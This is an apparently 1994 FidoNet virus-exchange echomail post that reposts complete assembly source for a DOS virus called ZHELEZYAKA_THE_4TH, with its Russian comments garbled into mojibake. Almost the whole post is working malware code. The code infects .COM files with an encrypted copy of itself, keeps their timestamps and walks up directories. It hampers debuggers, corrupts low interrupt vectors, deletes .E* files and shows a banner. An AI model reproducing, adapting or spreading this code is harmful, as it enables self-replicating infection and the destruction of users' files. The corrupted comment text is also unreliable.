;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg  : 1 of 64
; From : MeteO                               2:5030/136      Tue 09 Nov 93 08:59
; To   : -  *.*  -                                           Fri 11 Nov 94 08:10
; Subj : ViRii
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : ABC.PVT.HACK (ABC: • æª...)
;* From : Alexei Galich, 123:1000/6.2 (31 Oct 94 13:44)
;* To   : All
;* Subj : ViRii
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;p¨¢¥âáâ¢yî ‚ á, All
;
;‚®â ¢¨pyá ­ ¯¨á «, áâp è­ë©, á ¬ ¯¨á « !
;H ¥§¤ë ¯p¨­¨¬ îâáï á 1:00-8:00
;
;PS: Hy ­¥ §­ î ï ¯®ç¥¬y ®­ â ¡y«îæ¨î ­¥ ¯®­ï«, ¨§¢¨­¨â¥.
;
;--------8<-------------------------------------------------------
;
;
;         ZHELEZYAKA_THE_4TH

  IDEAL
  MODEL TINY
  CODESEG
  ORG 100H
  LOCALS
MAIN_BEGIN: JMP VIRUS_START_O
  DB 04H,0,' ZHELEZYAKA_THE_4TH ',0

EXIT_ADDRESS EQU 100H
DOS  EQU 21H
VIRUS_SIGNATURE EQU 04H
NUM_FIRST_BYTES EQU 4
ALREADY_INFECT EQU 3
COUNTER_ADDR EQU 510H
FALSE_BYTE_ADDR EQU 104H
COM_WILDCARD EQU (COM_WILDCARD_O-VIRUS_START_O)
EXE_WILDCARD EQU (EXE_WILDCARD_O-VIRUS_START_O)

WRITE_BUFFER EQU (WRITE_BUFFER_O-VIRUS_START_O)
ORIGIN_DIR EQU (WRITE_BUFFER+NUM_FIRST_BYTES)
NEW_DTA  EQU (ORIGIN_DIR+65)
COPY_BUFFER EQU (NEW_DTA+256)
FALSE_BYTES EQU (COPY_BUFFER+WRITE_BUFFER)

ORIGIN_BEGIN EQU (ORIGIN_BEGIN_O-VIRUS_START_O)
MAIN_PART_LEN EQU (WRITE_BUFFER)
INFECTED_NUMB EQU (INFECTED_NUMB_O-VIRUS_START_O)
XOR_VALUE EQU (XOR_VALUE_O-VIRUS_START_O)
XOR_VAL0 EQU (XOR_VAL0_O-VIRUS_START_O)
XOR_VAL00 EQU (XOR_VAL00_O-VIRUS_START_O)
XOR_VAL1 EQU (XOR_VAL1_O-VIRUS_START_O)
XOR_VAL2 EQU (XOR_VAL2_O-VIRUS_START_O)
XOR_VAL3 EQU (XOR_VAL3_O-VIRUS_START_O)
XOR_VAL4 EQU (XOR_VAL4_O-VIRUS_START_O)
BEGIN_CODING EQU (BEGIN_CODING_O-VIRUS_START_O)
CONT_CODING EQU (CONT_CODING_O-VIRUS_START_O)
MESSAGE  EQU (MESSAGE_O-VIRUS_START_O)
DOT  EQU (DOT_O-VIRUS_START_O)

VIRUS_START_O: CALL DETECT_BEGIN_O
XOR_VAL0_O DB 0
DETECT_BEGIN_O: POP SI
  SUB SI,3 ; SI -  ç «® ¢¨àãá 
  JMP SHORT @@0
XOR_VAL00_O DB 0
@@0:  LEA DI,[SI+BEGIN_CODING]
  CALL CODE
BEGIN_CODING_O =$

  MOV CX,NUM_FIRST_BYTES ; ‹¥ç¨¬
  LEA DI,[SI+ORIGIN_BEGIN] ; ä ©«
  MOV BX,100H   ; ¢
MOVE_LOOP: MOV AH,[DI]   ; ¯ ¬ïâ¨
  MOV [BX],AH   ;
  INC DI   ;
  INC BX   ;
  LOOP MOVE_LOOP  ;

  LEA DX,[SI+NEW_DTA] ; ‘â ¢¨¬
  MOV AH,1AH  ; ᢮î
  CALL CHECK  ; DTA

  MOV AH,47H   ;
  PUSH SI   ; ‡ ¯®¬¨­ ¥¬
  LEA SI,[SI+ORIGIN_DIR+1] ; ⥪ã騩
  CWD    ; ª â «®£
  CALL CHECK   ;
  POP SI   ;

FIND_FIRST: LEA DX,[SI+COM_WILDCARD] ; ®¨áª ¯¥à¢®£®
  XOR CX,CX   ; COM ä ©« 
  MOV AH,4EH   ;
FIND_NEXT: INT DOS   ;
  JNC @@L1   ;
  JMP NO_FILES_FOUND  ; …᫨ ­¥â, â® ...
@@L1:
  LEA DX,[SI+NEW_DTA+1EH] ; Žâªà®¥¬
  MOV AX,3D02H  ; íâ®â
  CALL CHECK   ; ä ©«


  MOV BX,AX   ; à®ç¨â ¥¬
  MOV AH,3FH   ; ¯¥à¢ë¥ 4
  LEA DX,[SI+ORIGIN_BEGIN] ; ¡ ©â 
  MOV DI,DX   ; ¨§
  MOV CX,NUM_FIRST_BYTES ; í⮣®
  INT DOS   ; ä ©« 
  ADD DI,NUM_FIRST_BYTES-1

  CMP [BYTE PTR DI],VIRUS_SIGNATURE
  JE @@L2
  JMP INFECT_FILE
@@L2:
  MOV AH,3EH  ; ‡ ªà®¥¬
  CALL CHECK  ; ä ©«

CONT_SEARCHING: MOV AH,4FH  ;  ©â¨
  JMP FIND_NEXT ; á«¥¤ãî騩 ä ©«

COM_WILDCARD_O DB '*.COM',0
EXE_WILDCARD_O DB '*.E*',0

MESSAGE_O DB 13,10,'ZHELEZYAKA_THE_4TH WITH YOU FOREVER',13,10,'$'
DOT_O  DB '..',0

NO_FILES_FOUND: MOV AH,3BH  ; ‘¬¥é ¥¬áï
  LEA DX,[SI+DOT] ; ­  ª â «®£
  INT DOS  ; ¢¢¥àå
  JC @@L4  ; ¯®ª 
  JMP FIND_FIRST ; ¢®§¬®¦­®
@@L4:
  XOR AX,AX   ;
  MOV ES,AX   ; “¢¥«¨ç¨¢ ¥¬
  MOV DI,COUNTER_ADDR  ; áç¥â稪
  MOV AX,[ES:DI]  ;

  INC AL   ;
  MOV [ES:DI],AX  ; —â®
  CMP AL,ALREADY_INFECT ; ¡ã¤¥¬
  JG INFECT_MORE  ; ¤¥« âì?
  CMP AH,ALREADY_INFECT-2 ;
  JG BANNER   ;
  JMP EXECUTE_PROG  ;

BANNER:  XOR AX,AX ; ‘¡à®á áç¥â稪 
  MOV [ES:DI],AX

  LEA DX,[SI+MESSAGE]  ; ‚뢮¤
  MOV AH,9   ; á®®¡é¥­¨ï
  CALL CHECK   ;

  MOV CX,5 ;
CONTINUE_NOISE: MOV DL,7 ; ¨áª
  MOV AH,2 ;
  INT DOS ;
  LOOP CONTINUE_NOISE
  JMP EXECUTE_PROG

INFECT_MORE: XOR AL,AL  ; ‘â¨à ­¨¥ ¯¥à¢®£® .E* ä ©« 
  INC AH
  MOV [ES:DI],AX

  LEA DI,[SI+ORIGIN_DIR] ;
  MOV [BYTE PTR DI],'\' ; ‚®ááâ ­ ¢«¨¢ ¥¬
  MOV AH,3BH   ; áâ àë©
  XCHG DX,DI   ; ª â «®£
  INT DOS   ;

  LEA DX,[SI+EXE_WILDCARD]
  XOR CX,CX
  MOV AH,4EH
  INT DOS
  JC EXECUTE_PROG

  LEA DX,[SI+NEW_DTA+1EH]
  MOV AH,41H
  INT 21H

EXECUTE_PROG: MOV DX,80H ; ‘â ¢¨¬
  MOV AH,1AH ; áâ àãî
  INT DOS ; DTA

  LEA DI,[SI+ORIGIN_DIR] ;
  MOV [BYTE PTR DI],'\' ; ‚®ááâ ­ ¢«¨¢ ¥¬
  MOV AH,3BH   ; áâ àë©
  XCHG DX,DI   ; ª â «®£
  INT DOS   ;

  MOV AX,DS
  MOV ES,AX
  MOV BP,100H   ;
  JMP BP   ;

INFECT_FILE:
  XOR AL,AL    ;
  MOV AH,[BYTE PTR SI+XOR_VALUE] ;
@@IFZERO: INC AH    ;
  JZ @@IFZERO   ; ®¤£®â ¢«¨¢ ¥¬
  MOV [BYTE PTR SI+XOR_VALUE],AH ; ­®¢ë©
  MOV [SI+XOR_VAL0],AH  ; ª®¤
  MOV [SI+XOR_VAL00],AH  ;
  MOV [SI+XOR_VAL1],AH  ;
  MOV [SI+XOR_VAL2],AH  ;
  MOV [SI+XOR_VAL3],AH  ;
  MOV [SI+XOR_VAL4],AH  ;

  MOV AX,5700H ; ‡ ¯®¬¨­ ¥¬
  CALL CHECK  ; ¢à¥¬ï
  PUSH CX  ; ᮧ¤ ­¨ï
  PUSH DX  ;

  XOR CX,CX  ; ˆ¤¥¬
  XOR DX,DX  ; ­ 
  MOV AX,4202H ; ª®­¥æ
  CALL CHECK  ; ä ©« 

  SUB AX,3    ; ®¤£®â ¢«¨¢ ¥¬
  MOV [BYTE PTR SI+WRITE_BUFFER],0E9H ; ­®¢ë¥
  MOV [SI+WRITE_BUFFER+1],AX  ; 4 ¡ ©â 
  MOV [BYTE PTR SI+WRITE_BUFFER+3],VIRUS_SIGNATURE

  MOV CX,MAIN_PART_LEN     ;
  MOV DI,SI       ; Š®¯¨à㥬
COPY_LOOP: MOV AH,[DI]       ; ¢¨àãá
  MOV [DI+COPY_BUFFER],AH     ; ¢
  INC DI       ; ¡ãää¥à
  LOOP COPY_LOOP      ;

  LEA DI,[SI+COPY_BUFFER+BEGIN_CODING]   ; Š®¤¨à㥬
  CALL CODER_DECODER      ; ¥£®

  LEA DI,[SI+COPY_BUFFER+CONT_CODING]
  CALL FIRST_CODE

  MOV CX,MAIN_PART_LEN  ; ®¤¡¨à ¥¬
  MOV AL,[BYTE PTR FALSE_BYTE_ADDR] ; ¤«¨­ã
  ADD AL,[FALSE_BYTES]  ;
  XOR AH,AH    ;
  ADD CX,AX    ; ¨è¥¬
  LEA DX,[SI+COPY_BUFFER]  ; £« ¢­ãî
  MOV AH,40H    ; ç áâì
  INT DOS    ; ¢¨àãá 


  XOR CX,CX  ; ˆ¤¥¬
  XOR DX,DX  ; ­ 
  MOV AX,4200H ; ­ ç «®
  CALL CHECK  ; ä ©« 

  MOV CX,NUM_FIRST_BYTES ; ˆá¯à ¢«ï¥¬
  LEA DX,[SI+WRITE_BUFFER] ; ¯¥à¢ë¥
  MOV AH,40H   ; ¡ ©âë
  INT DOS   ; ä ©« 

  POP DX  ; ‚®ááâ ­ ¢«¨¢ ¥¬
  POP CX  ; ¢à¥¬ï
  MOV AX,5701H ; ᮧ¤ ­¨ï
  CALL CHECK  ;

  MOV AH,3EH  ; ‡ ªà뢠¥¬
  INT DOS  ; ä ©«

  CALL CODE_INT

  JMP EXECUTE_PROG

ORIGIN_BEGIN_O DB 0CDH,20H,90H,90H

CONT_CODING_O =$

CODER_DECODER: MOV CX,CODER_DECODER-BEGIN_CODING_O-1
  MOV AH,[SI+XOR_VALUE]
  XOR AL,AL
  OUT 21H,AL
CODING_LOOP: IN AL,21H
  ADD AL,AH
  XOR [DI],AL   ; ‘ ¬
  INC DI   ; ª®¤¨à®¢é¨ª
  ADD AL,[FALSE_BYTE_ADDR]
  OUT 21H,AL   ;
  LOOP CODING_LOOP  ;
  XOR AL,AL
  OUT 21H,AL
  RET

CHECK:  PUSH AX ; «®ª¨à®¢ª  ¯à¥à뢠­¨ï
  PUSHF
  MOV AL,0FEH
  OUT 21H,AL
  MOV AH,4FH
  POPF
  POP AX
  INT 21H
  PUSH AX
  PUSHF
  IN AL,21H
  CMP AL,0FEH
@@HALT:  JNE @@HALT
  XOR AL,AL
  OUT 21H,AL
  POPF
  POP AX
  RET

CODE_INT: XOR AX,AX ; Š®¤¨à®¢ ­¨¥ INT 0 - 3
  MOV ES,AX
  MOV CX,12
COD_INT_CON: MOV BX,CX
  XOR [BYTE PTR ES:BX],10101010B
  LOOP COD_INT_CON
  PUSH CS
  POP ES
  RET
       ; ------------
FIRST_CODE: MOV CX,FIRST_CODE-CODER_DECODER ; à¥¤¢ à¨â¥«ì­ë©
  MOV AH,[SI+XOR_VALUE]  ; ª®¤¨à®¢é¨ª
  JMP SHORT FIRST_COD_LOOP
XOR_VAL1_O DB 0
FIRST_COD_LOOP: XOR [DI],AH
  INC DI
  JMP SHORT @@2
XOR_VAL2_O DB 0
@@2:  LOOP FIRST_COD_LOOP
  RET

XOR_VALUE_O DB 0

CODE:  PUSH DI
  LEA DI,[SI+CONT_CODING]
  JMP @@3
XOR_VAL3_O DB 0
@@3:  CALL FIRST_CODE
  MOV AH,40H
  JMP @@4
XOR_VAL4_O DB 0
@@4:  CALL CHECK  ; —â®¡ë ®¡¬ ­ãâì ¯¥à¥å¢ â稪
  CALL CODE_INT
  POP DI
  JMP SHORT CODER_DECODER

WRITE_BUFFER_O =$
  END MAIN_BEGIN

;---------------8<-------------------------------------------------
;
;- ‚ᥠíâ® ¡ë«® ¡ë ¯p¨ª®«ì­®, ª®£¤  ¡ë ­¥ ¡ë«® â ª ¡®«ì­®.
;
;  -= iR0NMAN =-
;
;-+- GoldED 2.50.B1016+
; + Origin: Œ…H’Ž‚Š€ - ’Ž €‡„HˆŠ !!! (123:1000/6.2)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
;    þ The MeÂeO
;
;/p            Check for code segment overrides in protected mode
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)